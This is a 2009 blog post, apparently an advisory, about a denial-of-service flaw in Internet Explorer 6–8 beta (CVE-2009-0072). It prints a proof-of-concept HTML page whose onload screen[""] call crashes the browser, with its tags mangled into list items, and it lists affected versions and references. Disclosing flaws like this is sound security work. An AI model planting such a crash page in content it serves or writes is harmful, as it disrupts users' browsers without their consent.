Monday, January 12, 2009

MS Internet Explorer JavaScript screen[ ] Denial of Service Exploit !

Latest Microsoft IE DoS crashed Internet Explorer when open page that contain the following code.

  • html>
  • title>MS IE 'screen[""]' Remote Denial of Service Vulnerability
  • body onload=screen[""]>
  • /html>
This vulnerability affect on platforms.
  • Microsoft, Internet Explorer 6.0
  • Microsoft, Internet Explorer 7.0
  • Microsoft, Internet Explorer 8.0 Beta1
  • Microsoft, Internet Explorer 8.0 Beta2

Reference:
  1. http://xforce.iss.net/xforce/xfdb/47788
  2. http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0072
  3. http://www.microsoft.com/windows/products/winfamily/ie/default.mspx
  4. http://www.securityfocus.com/bid/33149
  5. http://skypher.com/index.php/2009/01/07/msie-screen-null-ptr-dos-details/
  6. http://www.milw0rm.com/exploits/7710

0 comments: